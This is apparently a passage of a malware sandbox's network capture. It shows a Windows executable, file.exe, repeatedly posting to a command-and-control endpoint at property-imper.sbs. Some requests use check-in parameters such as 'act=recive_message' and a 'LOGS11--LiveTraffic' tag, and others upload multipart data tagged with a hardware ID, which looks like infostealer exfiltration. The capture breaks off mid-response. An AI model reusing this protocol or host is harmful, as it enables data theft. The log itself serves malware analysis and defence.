                                                                                                                                                                                          Nov 23, 2024 17:44:30.152729988 CET1236INData Raw: 3d 4b 7a c8 7f eb 1f 60 43 2b 80 4d 32 cb c4 2e 1e 7a 12 94 2d c7 ca 4a 40 34 83 c2 4b 0b 89 92 03 32 b3 3b 61 0f 38 ef 16 18 97 57 34 84 e4 ed 41 e1 cf 11 58 1e b2 fa 14 ff a3 f7 86 9c f8 58 1f 8e 2f d0 5f 78 2d 4b 7f 4f 9a 10 3f 23 04 46 59 0f
                                                                                                                                                                                          Data Ascii: =Kz`C+M2.z-J@4K2;a8W4AXX/_x-KO?#FYmR>:W`cdp^#$LIdv8['RiaF<3,Ug:@"`''r.VWf,j/,\v31k\3T{@8ua{I3&|u D2gn8Yx


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          0192.168.2.549704172.67.162.84443828C:\Users\user\Desktop\file.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:02 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                                          2024-11-23 16:44:02 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                          2024-11-23 16:44:02 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:02 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=urji53bk0ednv1u10lqmjo7hb1; expires=Wed, 19-Mar-2025 10:30:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1woKw3HkHEZN0AiKq%2BhSO1zc4PkrSlvUPrVQ5FpIDEtey5igL9GQjJqsEQ9QN0mhYnLyj7IJYzbo74KmFt9FDTq3%2B2%2BcsSZVkTKbnxaxCSLBO6l0fVXsKFuWpdybGXzDOXWkkoQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8e729f21ca9e6a55-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1765&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1642294&cwnd=235&unsent_bytes=0&cid=82d902f8baefdf73&ts=988&x=0"
                                                                                                                                                                                          2024-11-23 16:44:02 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                          2024-11-23 16:44:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          1192.168.2.549705172.67.162.84443828C:\Users\user\Desktop\file.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:04 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 53
                                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                                          2024-11-23 16:44:04 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                          2024-11-23 16:44:05 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:05 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=gg4ujtc70jlrqk3n9k65laispq; expires=Wed, 19-Mar-2025 10:30:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LnYSraMmbqXJw3UvWSBq8qFlMjJ6J2q5tQY0E%2FVyaePzbcAJ546TZtutozKvkhBdP2MVsXhEu%2BcJim1hWOwH5y2hYMUSblV0islt18SOuGAMZQQAvlqWblKqpkQG0CI5PO%2BB%2B68%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8e729f31ddfa42ee-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1717&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=955&delivery_rate=1705607&cwnd=211&unsent_bytes=0&cid=f6bdf9199c41275a&ts=1145&x=0"
                                                                                                                                                                                          2024-11-23 16:44:05 UTC353INData Raw: 31 64 37 63 0d 0a 41 31 34 57 36 2b 51 51 6f 64 52 47 4c 44 50 78 78 56 47 70 49 46 7a 68 42 4d 4e 50 68 46 7a 30 66 4b 65 58 30 4f 68 32 54 4b 46 34 66 47 44 4a 33 69 53 4e 39 6a 56 4a 45 63 75 78 49 39 78 46 63 4d 4e 6c 70 32 32 2b 4f 70 55 51 31 50 4c 38 79 67 41 68 67 7a 6b 34 64 34 65 58 64 59 33 32 49 31 51 52 79 35 34 71 69 30 55 79 77 7a 37 68 4b 75 34 2b 6c 52 44 46 39 72 75 48 42 69 44 43 61 7a 4a 78 67 34 46 7a 78 62 55 71 51 56 61 55 6f 44 44 44 54 6a 57 4d 62 4b 35 74 71 48 36 52 42 6f 57 74 38 71 55 54 4f 4d 42 4f 50 32 57 41 78 6d 32 4e 72 32 52 4a 58 64 50 2f 63 38 68 46 50 6f 31 69 70 79 54 73 4e 4a 77 59 78 50 4f 36 6d 42 38 71 79 57 73 38 63 6f 4b 4c 65 74 47 34 49 45 5a 64 6b 71 6f 77 69 77 78 2b 68 48 37 68 64 61 5a 74 70 42 33 55 35
                                                                                                                                                                                          Data Ascii: 1d7cA14W6+QQodRGLDPxxVGpIFzhBMNPhFz0fKeX0Oh2TKF4fGDJ3iSN9jVJEcuxI9xFcMNlp22+OpUQ1PL8ygAhgzk4d4eXdY32I1QRy54qi0Uywz7hKu4+lRDF9ruHBiDCazJxg4FzxbUqQVaUoDDDTjWMbK5tqH6RBoWt8qUTOMBOP2WAxm2Nr2RJXdP/c8hFPo1ipyTsNJwYxPO6mB8qyWs8coKLetG4IEZdkqowiwx+hH7hdaZtpB3U5
                                                                                                                                                                                          2024-11-23 16:44:05 UTC1369INData Raw: 48 66 38 4f 6b 4c 45 56 61 6c 72 55 34 77 6b 38 7a 67 32 75 72 49 75 55 2b 6b 52 54 50 2b 72 69 4f 47 53 50 46 59 54 77 30 78 38 5a 31 32 2f 5a 38 44 6e 4b 57 74 7a 54 48 56 48 79 35 4a 72 35 6a 2f 33 36 52 45 6f 57 74 38 6f 49 52 4c 63 42 71 4d 33 65 42 6a 57 44 44 70 43 4a 44 56 49 47 68 4e 73 56 49 50 5a 46 73 72 79 76 6c 4e 35 30 58 77 50 4b 32 79 6c 70 75 78 48 6c 38 4c 4d 6d 6e 66 38 69 36 4c 6c 6c 52 30 37 68 39 30 67 49 35 6a 79 62 35 62 65 49 2f 6b 68 2f 42 2b 37 79 4f 47 43 6a 4e 62 44 4e 79 67 34 5a 31 79 62 34 73 54 31 79 59 71 44 50 4f 54 7a 71 46 61 71 41 6f 70 6e 44 57 47 64 32 31 36 73 6f 36 4b 63 42 7a 66 6b 47 4b 69 48 7a 45 6f 47 52 52 48 34 72 6e 4e 4d 63 43 5a 73 4e 6f 70 43 4c 30 50 34 51 62 79 2b 65 2b 6a 78 49 6a 77 47 38 38 63 59
                                                                                                                                                                                          Data Ascii: Hf8OkLEValrU4wk8zg2urIuU+kRTP+riOGSPFYTw0x8Z12/Z8DnKWtzTHVHy5Jr5j/36REoWt8oIRLcBqM3eBjWDDpCJDVIGhNsVIPZFsryvlN50XwPK2ylpuxHl8LMmnf8i6LllR07h90gI5jyb5beI/kh/B+7yOGCjNbDNyg4Z1yb4sT1yYqDPOTzqFaqAopnDWGd216so6KcBzfkGKiHzEoGRRH4rnNMcCZsNopCL0P4Qby+e+jxIjwG88cY
                                                                                                                                                                                          2024-11-23 16:44:05 UTC1369INData Raw: 6f 47 52 52 48 34 72 6e 4e 4d 63 43 5a 73 4e 71 71 43 33 74 4e 4a 49 65 77 76 69 33 69 52 4d 74 7a 6d 59 32 65 6f 36 43 66 73 71 37 49 6b 35 57 6c 36 49 68 7a 6b 73 79 6a 79 62 76 62 65 45 6d 31 6b 61 46 32 72 57 63 46 77 48 41 63 44 55 30 6c 73 68 72 67 37 45 6f 44 67 6e 54 6f 44 62 44 53 54 69 4c 5a 72 4d 6f 36 44 57 58 46 4d 50 30 76 34 59 53 4c 73 4a 68 4f 6e 69 4a 67 58 58 52 70 43 46 49 51 35 6e 6e 66 59 74 46 4a 73 4d 2b 34 52 76 32 4b 59 63 49 68 38 43 78 68 42 6f 70 31 53 45 6a 4f 70 44 47 64 63 2f 32 66 41 35 61 6b 36 73 30 77 30 51 36 69 32 6d 75 4a 50 51 2f 6d 68 44 58 38 72 4b 44 47 69 48 50 61 44 46 7a 68 49 31 34 7a 72 49 6a 54 78 48 64 35 7a 54 54 41 6d 62 44 55 4c 45 67 36 68 43 64 45 73 79 31 72 63 51 4e 62 73 52 74 66 43 7a 4a 67 6e 37
                                                                                                                                                                                          Data Ascii: oGRRH4rnNMcCZsNqqC3tNJIewvi3iRMtzmY2eo6Cfsq7Ik5Wl6IhzksyjybvbeEm1kaF2rWcFwHAcDU0lshrg7EoDgnToDbDSTiLZrMo6DWXFMP0v4YSLsJhOniJgXXRpCFIQ5nnfYtFJsM+4Rv2KYcIh8CxhBop1SEjOpDGdc/2fA5ak6s0w0Q6i2muJPQ/mhDX8rKDGiHPaDFzhI14zrIjTxHd5zTTAmbDULEg6hCdEsy1rcQNbsRtfCzJgn7
                                                                                                                                                                                          2024-11-23 16:44:05 UTC1369INData Raw: 6c 53 57 6f 7a 54 50 52 44 48 44 4b 4f 45 71 2f 6e 37 4f 58 75 72 53 68 38 67 31 46 49 4e 2b 63 6d 33 4a 67 58 36 44 37 6d 52 43 55 70 2b 76 50 4d 31 4c 4d 6f 6c 76 71 69 48 74 4f 70 6f 58 77 50 4f 7a 6a 78 45 76 78 32 30 32 63 6f 71 46 66 63 79 35 4c 41 34 66 30 36 41 72 69 78 70 2b 70 6e 47 71 49 2b 42 2b 69 56 44 63 74 62 57 47 56 48 61 44 62 54 56 79 6a 34 4e 2b 77 72 41 73 53 31 6d 58 70 6a 58 4e 51 54 47 48 59 36 41 69 34 6a 4b 59 46 4d 54 30 76 6f 45 62 4a 63 59 68 63 6a 53 4f 6e 6a 4b 62 39 68 56 4e 52 34 53 33 50 34 74 64 63 4a 6f 6d 70 69 47 6d 5a 74 59 66 31 2f 2b 34 68 42 45 68 78 6d 49 7a 63 34 53 41 66 73 6d 2f 4c 45 68 65 6d 72 55 77 78 30 77 35 6a 57 71 76 49 4f 77 39 6d 31 36 4c 74 62 57 53 56 48 61 44 54 54 74 35 70 34 31 2b 78 50 59 37
                                                                                                                                                                                          Data Ascii: lSWozTPRDHDKOEq/n7OXurSh8g1FIN+cm3JgX6D7mRCUp+vPM1LMolvqiHtOpoXwPOzjxEvx202coqFfcy5LA4f06Arixp+pnGqI+B+iVDctbWGVHaDbTVyj4N+wrAsS1mXpjXNQTGHY6Ai4jKYFMT0voEbJcYhcjSOnjKb9hVNR4S3P4tdcJompiGmZtYf1/+4hBEhxmIzc4SAfsm/LEhemrUwx0w5jWqvIOw9m16LtbWSVHaDTTt5p41+xPY7
                                                                                                                                                                                          2024-11-23 16:44:05 UTC1369INData Raw: 6c 7a 7a 46 70 2b 32 79 61 58 4b 76 59 75 6c 56 7a 30 34 37 47 63 48 79 50 50 49 53 4d 36 6b 4d 5a 31 7a 2f 5a 38 44 6c 65 63 72 6a 44 45 51 7a 65 50 61 36 51 6b 34 7a 2b 51 47 73 2f 2f 73 6f 77 53 4c 38 5a 72 50 33 57 44 6a 33 58 4c 73 53 64 63 45 64 33 6e 4e 4e 4d 43 5a 73 4e 50 70 6a 2f 6f 4c 74 59 42 69 2b 7a 79 6a 52 68 75 6d 79 45 34 66 6f 61 43 64 63 2b 77 49 55 68 63 6b 71 67 79 79 30 30 36 69 47 2b 6e 4c 4f 73 37 6d 78 72 58 2f 37 6d 46 47 43 66 50 62 48 77 36 79 59 46 71 67 2b 35 6b 66 31 79 64 71 54 54 64 41 69 48 4e 66 2b 45 71 36 6e 37 4f 58 73 54 35 76 59 6b 62 4c 63 42 67 4e 6d 61 62 69 6e 76 4c 73 79 68 46 58 35 57 31 4e 63 52 4c 50 59 42 76 70 69 58 71 4e 4a 55 5a 68 62 76 79 6a 51 78 75 6d 79 45 66 59 35 6d 4c 4d 74 7a 34 50 51 35 57 6e
                                                                                                                                                                                          Data Ascii: lzzFp+2yaXKvYulVz047GcHyPPISM6kMZ1z/Z8DlecrjDEQzePa6Qk4z+QGs//sowSL8ZrP3WDj3XLsSdcEd3nNNMCZsNPpj/oLtYBi+zyjRhumyE4foaCdc+wIUhckqgyy006iG+nLOs7mxrX/7mFGCfPbHw6yYFqg+5kf1ydqTTdAiHNf+Eq6n7OXsT5vYkbLcBgNmabinvLsyhFX5W1NcRLPYBvpiXqNJUZhbvyjQxumyEfY5mLMtz4PQ5Wn
                                                                                                                                                                                          2024-11-23 16:44:05 UTC1369INData Raw: 4d 4c 49 5a 67 72 69 4c 76 4e 35 49 57 78 76 57 32 6a 68 4d 72 77 47 30 33 63 34 71 4a 64 73 71 34 4c 55 45 52 33 65 63 30 30 77 4a 6d 77 30 65 36 4c 75 6f 7a 31 67 47 4c 37 50 4b 4e 47 47 36 62 49 54 42 36 6a 49 5a 34 78 62 49 68 53 46 75 57 70 7a 6a 49 54 54 71 46 59 71 34 74 37 54 65 58 47 4d 44 2f 75 59 77 5a 4c 63 56 6e 66 44 72 4a 67 57 71 44 37 6d 52 75 53 70 36 72 4e 49 74 64 63 4a 6f 6d 70 69 47 6d 5a 74 59 56 79 66 47 31 69 68 6b 74 79 32 51 34 66 6f 79 47 65 74 47 2b 4a 45 6c 44 67 61 63 36 7a 6b 34 39 67 32 4b 6e 4a 4f 41 39 6b 6c 36 4c 74 62 57 53 56 48 61 44 54 44 42 7a 6f 49 46 70 67 36 6c 71 56 78 47 55 71 33 4f 54 41 6a 2b 49 62 4b 34 67 35 54 69 56 46 63 44 2f 73 34 30 63 49 39 46 69 4d 33 75 4e 68 6e 33 46 73 43 56 42 56 35 53 75 4d 73
                                                                                                                                                                                          Data Ascii: MLIZgriLvN5IWxvW2jhMrwG03c4qJdsq4LUER3ec00wJmw0e6Luoz1gGL7PKNGG6bITB6jIZ4xbIhSFuWpzjITTqFYq4t7TeXGMD/uYwZLcVnfDrJgWqD7mRuSp6rNItdcJompiGmZtYVyfG1ihkty2Q4foyGetG+JElDgac6zk49g2KnJOA9kl6LtbWSVHaDTDBzoIFpg6lqVxGUq3OTAj+IbK4g5TiVFcD/s40cI9FiM3uNhn3FsCVBV5SuMs
                                                                                                                                                                                          2024-11-23 16:44:05 UTC358INData Raw: 57 4a 38 4b 38 44 53 52 44 73 4c 69 76 63 70 61 62 73 77 68 5a 45 33 4a 6a 33 58 59 70 7a 4a 44 51 5a 54 6e 44 49 55 43 4a 73 4d 2b 34 52 6a 6c 4d 4a 67 5a 30 2b 54 2f 72 51 49 6b 78 48 45 37 59 34 62 47 50 49 4f 77 5a 42 59 43 33 65 63 33 32 67 4a 6d 30 7a 54 36 65 4c 56 70 78 6b 7a 61 75 36 76 4b 41 6d 36 62 4d 33 49 30 6d 38 59 71 67 2f 45 6e 58 45 4f 56 70 43 58 49 42 51 43 39 51 62 73 67 34 43 6d 48 49 50 76 79 71 49 63 53 4f 64 49 74 4b 58 65 48 69 48 58 56 39 6d 6f 4f 58 74 50 2f 43 6f 73 4b 66 72 77 6f 34 54 57 6d 5a 74 59 72 78 76 75 38 6a 51 49 2f 6a 6b 59 6d 65 59 2b 52 59 34 50 34 5a 45 67 52 79 2f 64 39 69 30 59 76 77 7a 37 78 66 37 31 72 78 55 6d 56 70 36 33 45 44 57 37 56 49 57 51 6d 78 38 5a 67 67 2b 35 6b 43 56 4b 42 74 54 58 49 56 44 33
                                                                                                                                                                                          Data Ascii: WJ8K8DSRDsLivcpabswhZE3Jj3XYpzJDQZTnDIUCJsM+4RjlMJgZ0+T/rQIkxHE7Y4bGPIOwZBYC3ec32gJm0zT6eLVpxkzau6vKAm6bM3I0m8Yqg/EnXEOVpCXIBQC9Qbsg4CmHIPvyqIcSOdItKXeHiHXV9moOXtP/CosKfrwo4TWmZtYrxvu8jQI/jkYmeY+RY4P4ZEgRy/d9i0Yvwz7xf71rxUmVp63EDW7VIWQmx8Zgg+5kCVKBtTXIVD3
                                                                                                                                                                                          2024-11-23 16:44:05 UTC1369INData Raw: 32 36 66 30 0d 0a 56 48 61 52 4c 33 78 6d 79 64 34 79 68 4c 55 32 58 46 65 51 73 54 43 4d 66 41 43 41 63 4b 77 69 37 54 2b 6f 49 4f 76 34 73 34 6b 61 62 50 4a 33 4d 57 53 4b 67 33 58 39 69 43 70 4a 52 5a 53 70 4e 63 73 43 63 4d 4e 70 34 58 58 66 66 74 35 65 2b 72 76 79 6b 6c 52 32 67 31 51 2f 65 6f 65 42 5a 4e 4c 37 42 31 68 63 6e 4b 77 79 69 77 78 2b 68 53 62 35 66 61 68 2b 6b 67 2b 46 72 65 4c 59 54 33 75 51 4e 6d 77 6d 6c 73 68 72 67 36 42 6b 46 67 50 64 35 79 47 4c 47 6e 37 45 61 4b 77 73 35 54 43 56 44 4e 66 7a 73 5a 77 58 61 66 31 66 48 58 6d 43 69 6e 2f 4d 76 52 70 77 63 4a 36 73 50 38 5a 4e 4e 62 31 59 74 43 37 6f 4d 4a 45 49 31 4c 58 38 79 68 74 75 6d 31 68 38 50 4d 6d 35 50 49 4f 75 5a 42 59 52 70 71 51 39 78 55 55 6f 6b 69 75 41 49 4f 30 79 6d
                                                                                                                                                                                          Data Ascii: 26f0VHaRL3xmyd4yhLU2XFeQsTCMfACAcKwi7T+oIOv4s4kabPJ3MWSKg3X9iCpJRZSpNcsCcMNp4XXfft5e+rvyklR2g1Q/eoeBZNL7B1hcnKwyiwx+hSb5fah+kg+FreLYT3uQNmwmlshrg6BkFgPd5yGLGn7EaKws5TCVDNfzsZwXaf1fHXmCin/MvRpwcJ6sP8ZNNb1YtC7oMJEI1LX8yhtum1h8PMm5PIOuZBYRpqQ9xUUokiuAIO0ym
                                                                                                                                                                                          2024-11-23 16:44:05 UTC1369INData Raw: 78 6d 41 59 6f 77 48 63 2f 4d 37 65 34 56 39 53 31 4e 45 68 53 72 5a 6b 59 78 30 51 35 6d 57 47 6e 43 38 5a 2b 32 46 37 4b 74 65 71 7a 56 47 61 44 58 6e 49 30 6b 63 59 71 67 34 4d 6e 51 46 2b 55 73 53 4b 47 5a 79 6d 41 64 71 63 75 70 6e 44 57 47 49 57 74 34 73 52 55 4b 74 49 68 5a 43 54 62 33 53 65 51 34 58 51 63 54 74 32 2b 63 39 30 43 5a 74 45 6f 34 54 2b 6d 5a 74 5a 5a 78 75 65 67 6a 42 63 34 77 43 59 43 53 71 2b 46 59 38 6d 58 4b 56 35 57 72 5a 6b 6d 79 45 77 77 68 48 43 77 62 61 68 2b 6d 56 36 64 7a 50 4c 43 57 43 6a 41 64 33 78 4c 78 38 5a 71 67 2b 35 6b 65 31 4b 64 71 54 54 64 55 33 4f 6c 5a 62 41 6e 78 7a 4f 47 47 59 57 37 38 6f 78 55 64 70 41 76 66 48 43 59 78 69 71 54 35 48 38 62 41 73 54 33 59 64 51 4d 4a 38 4e 77 34 58 57 30 63 4e 59 4d 68 61
                                                                                                                                                                                          Data Ascii: xmAYowHc/M7e4V9S1NEhSrZkYx0Q5mWGnC8Z+2F7KteqzVGaDXnI0kcYqg4MnQF+UsSKGZymAdqcupnDWGIWt4sRUKtIhZCTb3SeQ4XQcTt2+c90CZtEo4T+mZtZZxuegjBc4wCYCSq+FY8mXKV5WrZkmyEwwhHCwbah+mV6dzPLCWCjAd3xLx8Zqg+5ke1KdqTTdU3OlZbAnxzOGGYW78oxUdpAvfHCYxiqT5H8bAsT3YdQMJ8Nw4XW0cNYMha


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          2192.168.2.549706172.67.162.84443828C:\Users\user\Desktop\file.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:08 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=1N74I0C1RIRJ
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 12805
                                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                                          2024-11-23 16:44:08 UTC12805OUTData Raw: 2d 2d 31 4e 37 34 49 30 43 31 52 49 52 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 41 46 30 37 43 42 37 41 31 36 30 35 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 31 4e 37 34 49 30 43 31 52 49 52 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 4e 37 34 49 30 43 31 52 49 52 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 31 4e 37 34 49 30 43 31
                                                                                                                                                                                          Data Ascii: --1N74I0C1RIRJContent-Disposition: form-data; name="hwid"77AF07CB7A160586D7CBBD6DF28D3732--1N74I0C1RIRJContent-Disposition: form-data; name="pid"2--1N74I0C1RIRJContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--1N74I0C1
                                                                                                                                                                                          2024-11-23 16:44:09 UTC1025INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:08 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=5ndn08pkqscib0k245kdsp43rj; expires=Wed, 19-Mar-2025 10:30:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xvYmI7z1FHdcZ8buM0wz5mIuVMaijRSe1Dl%2FCooyljfurS34QsrARE%2FZ9uE3eoKRWEczHwRU3zD0mdd%2Fk%2Bd21zhqM%2BT1LSsygMZczYGX81o0hPmq9R0haGx7syuv3wp%2B8rQS%2BMg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8e729f483b5f8c7e-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1860&sent=11&recv=19&lost=0&retrans=1&sent_bytes=4230&recv_bytes=13741&delivery_rate=148827&cwnd=184&unsent_bytes=0&cid=9ae7d108281d355a&ts=1114&x=0"
                                                                                                                                                                                          2024-11-23 16:44:09 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                                                                                          2024-11-23 16:44:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          3192.168.2.549707172.67.162.84443828C:\Users\user\Desktop\file.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:10 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=QZFND7N75
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 15029
                                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                                          2024-11-23 16:44:10 UTC15029OUTData Raw: 2d 2d 51 5a 46 4e 44 37 4e 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 41 46 30 37 43 42 37 41 31 36 30 35 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 51 5a 46 4e 44 37 4e 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 5a 46 4e 44 37 4e 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 51 5a 46 4e 44 37 4e 37 35 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                          Data Ascii: --QZFND7N75Content-Disposition: form-data; name="hwid"77AF07CB7A160586D7CBBD6DF28D3732--QZFND7N75Content-Disposition: form-data; name="pid"2--QZFND7N75Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--QZFND7N75Conten
                                                                                                                                                                                          2024-11-23 16:44:12 UTC1028INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:11 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=vefvmgjhm0kih5n2pkpafdrgur; expires=Wed, 19-Mar-2025 10:30:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
